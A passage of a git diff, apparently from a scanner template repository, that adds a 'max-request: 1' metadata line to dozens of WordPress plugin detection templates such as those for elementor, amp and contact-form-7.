     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
